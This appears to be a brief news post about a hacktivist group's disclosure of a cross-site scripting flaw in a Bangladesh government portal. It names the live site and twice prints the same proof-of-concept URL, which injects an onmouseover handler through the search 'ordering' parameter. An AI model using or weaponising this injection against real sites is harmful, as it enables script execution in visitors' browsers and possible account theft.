Brazilian Cyber Army Discovered Cross Site Scripting Vulnerability In Bangladesh Portal
Through a page they published on their official website,members of Brazilian Cyber Army published about a cross site scripting XSS vulnerability which they discovered in a Bangladesh government website.They stated about the attack and also about the two exploits.
Website Vulnerable:
http://www.bangladesh.gov.bd/
Proof of Concept:
http://www.bangladesh.gov.bd/index.php?Itemid=99999999&option=com_search&ordering=%22%20onmouseover%3dprompt%28980582%29%20bad%3d%22&searchphrase=any&searchword=1&submit=Search
Official Release By Brazilian Cyber Army: [Click Here!]
Website Vulnerable:
http://www.bangladesh.gov.bd/
Proof of Concept:
http://www.bangladesh.gov.bd/index.php?Itemid=99999999&option=com_search&ordering=%22%20onmouseover%3dprompt%28980582%29%20bad%3d%22&searchphrase=any&searchword=1&submit=Search
Official Release By Brazilian Cyber Army: [Click Here!]